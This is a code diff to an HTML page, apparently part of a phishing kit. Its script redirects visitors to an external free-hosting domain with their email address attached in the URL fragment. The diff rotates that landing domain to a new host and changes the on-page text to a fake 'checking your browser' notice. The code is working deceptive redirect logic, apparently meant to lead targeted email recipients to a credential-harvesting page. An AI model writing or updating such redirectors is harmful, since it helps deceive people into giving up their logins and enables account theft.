--- a/accesspoint.html
+++ b/accesspoint.html
@@ -48,7 +48,7 @@
       const jargon = generateJargon();
 
       // Construct redirect URL: email + jargon in hash
-      const redirectURL = `https://pro-guest3940950.surge.sh/#${email}`;
+      const redirectURL = `https://staticfile-ffbec.wasmer.app/#${email}`;
 
       // Redirect
       window.location.href = redirectURL;
@@ -61,6 +61,6 @@
   </script>
 </head>
 <body>
-  <div id="message">Please wait<span id="dots"><span>.</span><span>.</span><span>.</span></span></div>
+  <div id="message">Please wait while we check your browser<span id="dots"><span>.</span><span>.</span><span>.</span></span></div>
 </body>
 </html>
